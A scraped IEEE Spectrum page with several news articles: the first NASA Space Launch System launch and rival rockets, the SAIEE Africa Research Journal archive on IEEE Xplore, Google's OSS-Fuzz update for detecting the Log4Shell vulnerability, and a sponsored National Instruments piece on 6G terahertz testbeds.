NASA’s Space Launch System Will Lift Off - IEEE Spectrum

2021-12-27 15:43:07 By : Mr. Henry Zhang

IEEE websites place cookies on your device to give you the best user experience. By using our websites, you agree to the placement of these cookies. To learn more, read our Privacy Policy.

But with rival rockets readying for flight, the value of SLS is murky

Last October, an Orion spacecraft was mounted atop the Space Launch System.

Inside the Vehicle Assembly Building (VAB) at NASA’s Kennedy Space Center in Florida—a cavernous structure built in the 1960s for constructing the Apollo program’s Saturn V rockets and, later, for preparing the space shuttle—the agency’s next big rocket is taking shape.

Tom Whitmeyer, NASA’s deputy associate administrator for exploration system development, recalled seeing the completed Space Launch System (SLS) vehicle there in October, after the last component, the Orion spacecraft, was installed on top. To fully view the 98-meter-tall vehicle, he had to back off to the opposite side of the building.

“It’s taller than the Statue of Liberty,” he said at an October 2021 briefing about the rocket’s impending launch. “And I like to think of it as the Statue of Liberty, because it’s [a] very engineering-complicated piece of equipment, and it’s very inclusive. It represents everybody.”

Perhaps so. But it’s also symbolic of NASA’s way of developing rockets, which is often characterized by cost overruns and delays. As this giant vehicle nears its first launch later this year, it runs the risk of being overtaken by commercial rockets that have benefited from new technologies and new approaches to development.

NASA’s newest rocket didn’t originate in the VAB, of course—it began life on Capitol Hill. In 2010, the Obama administration announced its intent to cancel NASA’s Constellation program for returning people to the moon, citing rising costs and delays. Some in Congress pushed back, worried about the effect on the space industry of canceling Constellation at the same time NASA was retiring its space shuttles.

The White House and Congress reached a compromise in a 2010 NASA authorization bill. It directed the agency to develop a new rocket, the Space Launch System, using technologies and contracts already in place for the shuttle program. The goal was to have a rocket capable of placing at least 70 tonnes into orbit by the end of 2016.

To achieve that, NASA extensively repurposed shuttle hardware. The core stage of SLS is a modified version of the external tank from the shuttle, with four RS-25 engines developed for the shuttle mounted on its base. Attached to the sides of the core stage are two solid-rocket boosters, similar to those used on the shuttle but with five segments of solid fuel instead of four.

Difficulties pushed back the first SLS launch by years, although not all the problems were within NASA’s control.

Mounted on top of the core stage is what’s called the Interim Cryogenic Propulsion Stage, which is based on the upper stage for the Delta IV rocket and is powered by one RL10 engine, a design that has been used for decades. This stage will propel the Orion capsule to the moon or beyond after it has attained orbit. As the name suggests, this stage is a temporary one: NASA is developing a more powerful Exploration Upper Stage, with four RL10 engines. But it won’t be ready until the mid-2020s.

Even though SLS uses many existing components and was not designed for reusability, combining those components to create a new rocket proved more difficult than expected. The core stage, in particular, turned out to be surprisingly complex, as NASA struggled with the challenge of incorporating four engines. Once the first core stage was complete, it spent more than a year on a test stand at NASA’s Stennis Space Center in Mississippi, including two static-fire tests of its engines, before going to the Kennedy Space Center for launch preparations.

Those difficulties pushed back the first SLS launch by years, although not all the problems were within NASA’s control. Hurricanes damaged the Stennis test stand as well as the New Orleans facility where the core stage is built. The pandemic also slowed the work, before and after all the components arrived at the VAB for assembly. “In Florida in August and September [2021], it hit our area very hard,” said Mike Bolger, manager of the exploration ground systems program at NASA, describing the most recent wave of the pandemic at the October briefing.

Now, after years of delays, the first launch of the SLS is finally getting close. “Completing stacking [of the SLS] is a really important milestone. It shows that we’re in the home stretch,” said Mike Sarafin, NASA’s manager for the first SLS mission, called Artemis 1, at the same briefing.

After a series of tests inside the VAB, the completed vehicle will roll out to Launch Complex 39B. NASA will then conduct a practice countdown called a wet dress rehearsal—“wet” because the core stage will be loaded with liquid-hydrogen and liquid-oxygen propellants.

Controllers will go through the same steps as in an actual countdown, stopping just before the point where the RS-25 engines would normally ignite. “For us, on the ground, it’s a great chance to get the team and the ground systems wrung out and ready for launch,” Bolger said of the wet dress rehearsal.

This giant tank will help increase the capacity for storing liquid hydrogen at the Kennedy Space Center. Glenn Benson/NASA

After that test, the SLS will roll back to the VAB for final checks before returning to the pad for the actual launch. The earliest possible launch for Artemis 1 is 12 February 2022, but at the time of this writing, NASA officials said it was too soon to commit to a specific launch date.

“We won’t really be in a position to set a specific launch date until we have a successful wet dress [rehearsal],” Whitmeyer said. “We really want to see the results of that test, see how we’re doing, see if there’s anything we need to do, before we get ready to launch.”

To send the uncrewed Orion spacecraft to the moon on its desired trajectory, SLS will have to launch in one of a series of two-week launch windows, dictated by a variety of constraints. The first launch window runs through 27 February. A second opens on 12 March and runs through 27 March, followed by a third from 8 to 23 April. Sarafin said there’s a “rolling analysis cycle” to calculate specific launch opportunities each day.

A complicating factor here is the supply of propellants available. The core stage’s tanks store 2 million liters of liquid hydrogen and almost three-quarters of a million liters of liquid oxygen, putting a strain on the liquid hydrogen available at the Kennedy Space Center.

“This rocket is so big, and we need so much liquid hydrogen, that our current infrastructure at the Kennedy Space Center just does not support an every-day launch attempt,” Sarafin said. If a launch attempt is postponed after the core stage is fueled, Bolger explained, NASA would have to wait days to try again. That’s because a significant fraction of liquid hydrogen is lost to boil-off during each launch attempt, requiring storage tanks to be refilled before the next attempt. “We are currently upgrading our infrastructure,” he said, but improvements like larger liquid hydrogen storage tanks won’t be ready until the second SLS mission in 2023. There’s no pressure to launch on a specific day, Sarafin said. “We’re going to fly when the hardware’s ready to fly.”

SLS is not the only game in town when it comes to large rockets. In a factory located just outside the gates of the Kennedy Space Center, Blue Origin, the spaceflight company founded by Amazon’s Jeff Bezos, is working on its New Glenn rocket. While not as powerful as SLS, its ability to place up to 45 tonnes into orbit outclasses most other rockets in service today. Moreover, unlike SLS, the rocket’s first stage is reusable, designed to land on a ship.

New Glenn and SLS do have something in common: development delays. Blue Origin once projected the first launch of the rocket to be in 2020. By early 2021, though, that launch date had slipped to no earlier than the fourth quarter of 2022.

A successful SpaceX Starship launch vehicle, fully reusable and able to place 100 tonnes into orbit, could also make the SLS obsolete.

A key factor in that schedule is the development of Blue Origin’s BE-4 engine, seven of which will power New Glenn’s first stage. Testing that engine has taken longer than expected, affecting not only New Glenn but also United Launch Alliance’s new Vulcan Centaur rocket, which uses two BE-4 engines in its first stage. Vulcan’s first flight has slipped to early 2022, and New Glenn could see more delays as well.

Meanwhile halfway across the country, at the southern tip of Texas, SpaceX is moving ahead at full speed with its next-generation launch system, Starship. For two years, the company has been busy building, testing, flying—and often crashing—prototypes of the vehicle, culminating in a successful flight in May 2021 when the vehicle lifted off, flew to an altitude of 10 kilometers, and landed.

SpaceX is now preparing for orbital test flights, installing the Starship vehicle on top of a giant booster called, aptly, Super Heavy. A first test flight will see Super Heavy lift off from the Boca Chica, Texas, test site and place Starship in orbit. Starship will make less than one lap around the planet, though, reentering the atmosphere and splashing down in the Pacific about 100 kilometers from the Hawaiian island of Kauai.

When that launch will take place remains uncertain—despite some optimistic announcements. “If all goes well, Starship will be ready for its first orbital launch attempt next month, pending regulatory approval,” SpaceX CEO Elon Musk tweeted on 22 October 2021. But Musk surely must have known at the time that regulatory approval would take much longer.

SpaceX needs a launch license from the U.S. Federal Aviation Administration to perform that orbital launch, and that license, in turn, depends on an ongoing environmental review of Starship launches from Boca Chica. The FAA hasn’t set a schedule for completing that review. But the draft version was open for public comments through the beginning of November, and it’s likely to take the FAA months to review those comments and incorporate them into the final version of the report. That suggests that the initial orbital flight of Starship atop Super Heavy will also take place sometime in early 2022.

Starship could put NASA in a bind. The agency is funding a version of Starship to serve as a lunar lander for the Artemis program, transporting astronauts to and from the surface of the moon as soon as 2025. So NASA clearly wants Starship development to proceed apace. But a successful Starship launch vehicle, fully reusable and able to place 100 tonnes into orbit, could also make the SLS obsolete.

Of course, on the eve of the first SLS launch, NASA isn’t going to give up on the vehicle it’s worked so long and hard to develop. “SLS and Orion were purpose-designed to do this mission,” says Pam Melroy, NASA deputy administrator. “It’s designed to take a huge amount of cargo and people to deep space. Therefore, it’s not something we’re going to walk away from.”

Jeff Foust, a frequent contributor to IEEE Spectrum, is a senior staff writer with SpaceNews. He has a Ph.D. in planetary sciences from MIT and a B.S. in geophysics and planetary science from Caltech.

Articles going back to 1909 are now in IEEE Xplore

Kathy Pretz is editor in chief for The Institute, which covers all aspects of IEEE, its members, and the technology they're involved in. She has a bachelor's degree in applied communication from Rider University, in Lawrenceville, N.J., and holds a master's degree in corporate and public communication from Monmouth University, in West Long Branch, N.J.

The full archives of the SAIEE Africa Research Journal—some issues dating back more than 100 years—are now available in the IEEE Xplore Digital Library.

The open-access quarterly journal from the South African Institute of Electrical Engineers publishes peer-reviewed articles on research in IEEE’s fields of interest. The digitization of the 5,000 articles—dating between 1909, when the publication launched, and 2008—took almost eight years to complete. The archive is in addition to articles from 2009 onward that were added to IEEE Xplore in 2018.

“Prior to 2005, the journal was published in print. This was therefore a big project,” says IEEE Fellow Saurabh Sinha, the journal’s managing editor. “From the digitized articles, using optical character recognition, search features were enabled—which is amazing.”

Sinha, a former vice president of IEEE Educational Activities and a former IEEE Board of Directors member, is one of the IEEE volunteers who led the effort. He is a professor and a deputy vice chancellor for research and internationalization at the University of Johannesburg.

The digital library now houses the journal’s entire collection. The majority of the authors are from Africa. In collaboration with the IEEE Africa Council, special issues focus on areas such as East Africa.

The SAIEE Africa Research Journal is one of the oldest electrical engineering journals, Sinha says. It originally was called Transactions of the SAIEE and was renamed when the journal went digital in 2005.

The Transactions of AIEE from the American Institute of Electrical Engineers, one of IEEE’s predecessor societies, is the oldest such journal. It began publishing in 1884.

With the SAIEE Africa Research Journal on IEEE Xplore, millions of engineers, researchers, and students around the world are able to discover and read about the research activities in the journal, notes Naveen Maddali, senior product manager for planning and implementation for IEEE Global Products and Marketing.

“SAIEE’s exposure to a global audience is increased, while IEEE is able to provide additional valuable research content to the users of IEEE Xplore,” Maddali says.

The relationship between IEEE and SAIEE goes back to 1995, when the two organizations signed an IEEE National Society Agreement. They committed to working together to “enhance the professional and personal growth” of the region’s engineers “and related fields of interest.” They do so by elevating technical skills, enhancing the image of the profession, encouraging professional growth, and developing networking opportunities.

Sinha says the agreement has engendered a collegial relationship between the two organizations over the years.

“SAIEE’s exposure to a global audience is increased, while IEEE is able to provide additional valuable research content to the users of IEEE Xplore.”

“I think it really is a renewed relationship through this journal between the SAIEE and IEEE,” he says, “which will bring about value for both organizations in the future.”

Sinha credits IEEE staff members from several organizational units for the success of the archive project.

“I’ve been a volunteer now for more than 20 years, and I think the support of the staff was quite phenomenal,” he says. “Just imagine the magnitude of the project. Through this collaboration, the SAIEE Africa Research Journal was able to extend its reach and exposure. I think the power of IEEE Xplore really pulls in SAIEE’s fields of interest.”

Finding funding for the project was made possible by the IEEE Foundation and the IEEE Africa Council, which is a sponsor of the journal. The cost of hosting such a large archive would ordinarily be too expensive, but the SAIEE and key IEEE volunteers worked with IEEE and the IEEE Foundation to find the money, Sinha says.

They were able to use existing funds that were donated to the AIEE in the early 1900s. Because of the limitations placed on how money from the funds could be used, IEEE sought and received permission in 2013 to modify the use of the funds to be able to support projects, like this one, that add scholarly content from a non-U.S. publisher to the digital library, according to the IEEE Foundation’s executive director Karen Galuchi.

Updated “fuzzing” service now sleuthing after the Internet’s latest (and greatest?) vulnerability

Edd Gent is a freelance science and technology writer based in Bangalore, India. His writing focuses on emerging technologies across computing, engineering, energy and bioscience. He's on Twitter at @EddytheGent and email at edd dot gent at outlook dot com. His PGP fingerprint is ABB8 6BB3 3E69 C4A7 EC91 611B 5C12 193D 5DFC C01B. His public key is here. DM for Signal info.

A major bug in a widely-used piece of open source software called Log4j has thrown the IT world into pandemonium. The hole was not even made public a month ago (as of this writing), and yet it’s already been classified by Internet security analysts as among the biggest vulnerabilities in cybersecurity history.

By some estimates, for instance, some 93 percent of enterprise cloud computing environments around the world are affected. According to sources quoted in the Financial Times, as of Dec. 14, more than 1.2 million cyberattacks (at a rate of as much as 100 attacks per minute) had been observed—with no likely end in sight for, according to these sources at least, “months to come.”

As the industry scrambles to plug the gaps, Google has upgraded one of its security tools to help open source developers hunt down the vulnerability and others like it.

The panic around this new bug, which has been dubbed Log4Shell, is primarily down to its sheer pervasiveness. The tool it targets is used in a huge number of applications and the list of affected services is a who’s who of leading tech companies. The nature of the vulnerability also makes it relatively simple for attackers to run code that lets them take complete control of targeted devices.

“Fuzzing” bombards programs with random inputs to force errors that reveal security vulnerabilities. Google has now updated its fuzzing tool to track down Log4Shell—the name for the vulnerability in Apache’s ubiquitous Log4j code.

When the bug was disclosed on December 9, it was given a severity score of 10 out of 10 by the Apache Software Foundation (ASF), the non-profit whose volunteers develop Log4j. While ASF has released patches that remedy the flaw, it could take months or even years to find and fix every instance. The incident has reignited debates around how reliant today’s critical computing infrastructure is on open source code, which is typically maintained by small teams of under-resourced developers working for free in their spare time.

While’s there’s no silver bullet, Google’s open source security team thinks one potential solution is to provide open source developers with better tools to hunt for bugs. One promising approach is called “fuzzing”, which bombards programs with random or intentionally invalid inputs to force errors that reveal stability issues or security vulnerabilities. Google has provided a free continuous fuzzing service called OSS-Fuzz to major open source projects since 2016. And now the company has collaborated with security firm Code Intelligence to update the tool so that it can hunt down Log4Shell and other vulnerabilities that rely on the same mode of attack.

“We're trying to expand the tools capabilities to find similar sorts of vulnerabilities so that more developers can secure their own code bases,” says Google’s Jonathan Metzman. “The developer doesn't really need to think about how the fuzzer is detecting them, it just does it for them.”

Given the complexity of modern software, developers don’t have time to build every module from scratch and so they often rely on open-source software components like Log4j. As the Java software was designed, Log4j keeps records of activity within applications which can help keep track of errors and performance problems. As an example, clicking on a dead link or typing in a wrong URL, which typically produces a 404 error message, are among the activities that Log4j keeps track of for a web domain’s system administrators. Log4j thus performs a critical function for many types of software, which is the reason for the tool’s ubiquity.

Building a fix is only the first step in getting the crisis under control; now developers and system administrators across the industry have to scour their code for instances of the bug.

But last month, engineers at Chinese tech firm Alibaba discovered they could get Log4j to log a message containing a string of malicious code that triggers a connection to an external server under their control. Once this connection is established the attacker can remotely run whatever code they want on the targeted system.

The Alibaba researchers notified ASF as soon as they found the bug and gave them time to create an update that deals with the vulnerability before disclosing it. Since then, two more harder to exploit vulnerabilities in Log4j have also been uncovered and patched. But building a fix is only the first step in getting the crisis under control; now developers and system administrators across the industry have to scour their code for instances of the bug.

“The way software is built today is very much layer upon layer upon layer,” says Gary Gregory, a member of the ASF project management committee responsible for Log4j. “So developers, applications, companies may not even realize whether or not they're using certain software.”

Even once they’ve found the bug, some companies have stringent processes governing how they can make updates, which may delay their ability to resolve the problem, says Gregory. There are also likely to be companies relying on older software that is no longer supported or whose vendors are now defunct.

And while the updates put out by ASF have completely removed the functionality that allows the Log4j tool to connect to an external server, Gregory points out that it’s a generic capability baked deep into Java. “We've just ripped that out,” he says. “But I'm betting people will look at other software programs for the same type of vulnerability.”

This functionality is exactly what Google’s updated fuzzer looks for, though, which means that as well as detecting Log4shell it should also be able to find other bugs that use the same mode of attack. The solution is not a replacement for more formal security testing, but OSS-Fuzz has already discovered more than 7,000 vulnerabilities since its launch.

Metzman says the group has plans to further expand the kinds of bugs OSS-Fuzz can detect as well, and believes the approach can be a powerful tool for under-resourced open-source teams. “The randomness of fuzzing explores a lot of program states,” he says. “It’s very good at reaching these kind of obscure states that are deep into the program and finding vulnerabilities in there.”

It's hard to say whether this kind of tool could help catch the next major vulnerability, says Metzman. But he points out that researchers have shown that fuzzing could have detected the Heartbleed bug that set the internet on fire in 2014. If we want catch the next major vulnerability though, we need to provide more support to open source developers across the board, says John Hammond from security firm Huntress Labs. His company also released a tool to test for Log4Shell in the aftermath of the disclosure, but he thinks an more even important goal is to increase education and awareness of security issues in the open source community. With any luck, this crisis will provide the impetus, he says.

"Maybe it will shine a spotlight on the fact that we need a little bit more love for the open source community," he adds. "Because a lot of our modern world and technology certainly stands on their shoulders."

Developing tools that can test new technologies for 6G networks is the key step in making it a reality

This is a sponsored article brought to you by National Instruments (NI).

While 5G networks continue their rollout around the world, researchers and engineers are already looking ahead to a new generation of mobile networks, dubbed 6G. One of the key elements for 6G networks will be to move beyond the millimeter wave (mmWave) spectrum and up into the terahertz (THz) spectrum. The THz spectrum will certainly open up more bandwidth, but there are a number of technical challenges that will need to be addressed if mobile networks can ever exploit this spectrum.

“The higher carrier frequencies of THz communications in 6G networks yield even harder propagation conditions than mmWave transmission,” said Walter Nitzold, Principal Software Engineer and Group Manager at National Instruments. “These high attenuations can be overcome by antenna designs specifically tailored to yield respective antenna gains with pencil-like beams.”

It is in the design of these new kinds of antennas and network hardware where National Instruments (NI) is working hand-in-hand with researchers around the world who are trying to make 6G a reality.

Simplified block diagram of a bidirectional system capable of real-time two-way communications.

The challenges of moving to THz are not limited to the antennas. The design of RF ICs for THz frequencies brings additional obstacles as the wavelength falls in the range of the IC size, putting further constraints on the design methodology, according to Nitzold.

Nitzold also points out that with technologies like CMOS appearing as though they can only scale up to 140 GHz causes a problem in the linearity of components over bandwidths of multiple GHz and transmit output power (TX power). Further, the requirements on baseband processing and fast and precise beam management for pencil-like beams will become a challenging research area.

If research in addressing these issues is to succeed, a new generation of testbeds need to be set up with high-performance, real-time capability. Because THz testbeds will have range limitations due to path loss, initial testbeds will be limited to lab-based setups mostly consisting of simple short-range components such as horn antennas, according to Nitzold.

“Terahertz Communications have the potential to even replace fiber-optic cables with dedicated point-to-point transmission.”

—Walter Nitzold, Principal Software Engineer and Group Manager at National Instruments

However, as soon as larger deployments in testbeds become a reality, the high bandwidth use-cases will put additional requirements on throughput of the backend, especially when testbeds try to set up a disaggregated radio access network (RAN) structure with distributed THz nodes. These would need to be individually served with fiber connections.

“The cost of investments for THz testbeds will become even larger due to the groundbreaking technological changes, demanding for strong cooperation between many partners to stem this effort jointly,” noted Nitzold.

NI is looking ahead to addressing these testbed issues with its sub-THz and mmWave Transceiver System (MTS), which provides a flexible, high-performance platform to demonstrate real-world results for high-frequency research and prototyping.

System diagram of transmit and receive chains.

The modular system architecture can be configured to meet a variety of use cases, built on a common set of components. LabVIEW reference examples provide a starting point for channel sounding and physical layer IP experiments, while allowing the user to modify IP to perform research into new areas. A multi-FPGA processing architecture enables a truly real-time system with no offline processing needed and with 2 GHz of real-time bandwidth, enabling over-the-air (OTA) prototypes of two-way communications links.

“The strength of the NI approach lies in a flexible and scalable modular hardware and software platform,” said Nitzold. “This platform is suitable to adjust to different needs of a testbed, e.g., interface to new RF frontends as well as other components.”

Walter Nitzold, Principal Software Engineer and Group Manager at National Instruments.

Another benefit of NI’s approach is the incorporation of industry-standard functional splits, which allows for a distributed deployment in a testbed and flexible realization of different use-cases, according to Nitzold. “Additionally, NI focuses on real-time processing for communication links to showcase the theoretic gains in scenarios that are close to reality,” he added.

All of this will ultimately make it possible to access the THz spectrum and access greater bandwidth.

“The THz regime will allow for new opportunities and applications such as immersive virtual reality, mobile holograms, wireless cognition, and the possibility to sense the environment in an unprecedented accuracy with a possible combination of radar and communication,” said Nitzold.

“Terahertz Communications have the potential to even replace fiber-optic cables with dedicated point-to-point transmission. This will also allow new ways of intra-device communication.”